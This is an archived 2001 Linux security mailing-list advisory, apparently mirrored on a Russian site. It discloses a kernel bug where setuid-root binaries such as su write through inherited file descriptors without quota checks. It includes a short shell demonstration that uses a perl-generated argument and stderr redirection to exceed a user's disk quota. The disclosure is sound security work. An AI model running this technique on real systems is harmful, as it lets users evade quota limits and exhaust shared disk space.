The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Overriding qouta limits in Linux kernel


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Mon, 22 Oct 2001 10:43:13 +0200 (CEST)
From: =?ISO-8859-2?Q?Wojciech_Purczy=F1ski?= <[email protected]>
To: [email protected], [email protected]
Subject: Overriding qouta limits in Linux kernel


Almost any suid binary may be used to create large files overriding quota
limits.

When setuid-root binary inherits file descriptors from user process it may
write to it without respecting the quota restrictions. This is because
suid process has CAP_SYS_RESOURCE effective capability enabled during
writing to the file. Quota does not know anything about who opened file
descriptor and checks current process privileges only. This is bug in
kernel and not in those setuid-root binaries.

Tested on Linux kernel 2.2.19.

Example:

cliph$quota -u wp
Disk quotas for user wp (uid 500):
     Filesystem  blocks   quota   limit   files   quota   limit
      /dev/hda6       4      10      10       1      10      10

cliph$perl -e 'print "a"x16384' >>myfile
/vol1: write failed, user disk limit reached.

cliph$ls -l myfile
-rw-rw-r--    1 wp       wp           4096 Oct 22 10:33 myfile

cliph$su $(perl -e 'print "a"x16384') 2>>myfile
cliph$ # ^^^ this is it: su writes error message to fd 2 without limits

cliph$ls -l myfile
-rw-rw-r--    1 wp       wp          20505 Oct 22 10:34 myfile

cliph$quota -u wp
Disk quotas for user wp (uid 500):
     Filesystem  blocks   quota   limit   files   quota   limit
      /dev/hda6      28*     10      10       2      10      10

(I removed `grace' fields from quota output)

PS: Please include my address in CC as I may be not subscribed to the
list(s).

_________________________________________________________________
 Wojciech PurczyЯski | Security Officer | http://cliph.linux.pl/
-----------------------------------------------------------------
 Murphy's law says that there is always one more bug...
          ...but he forgot to mention whether it is exploitable.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру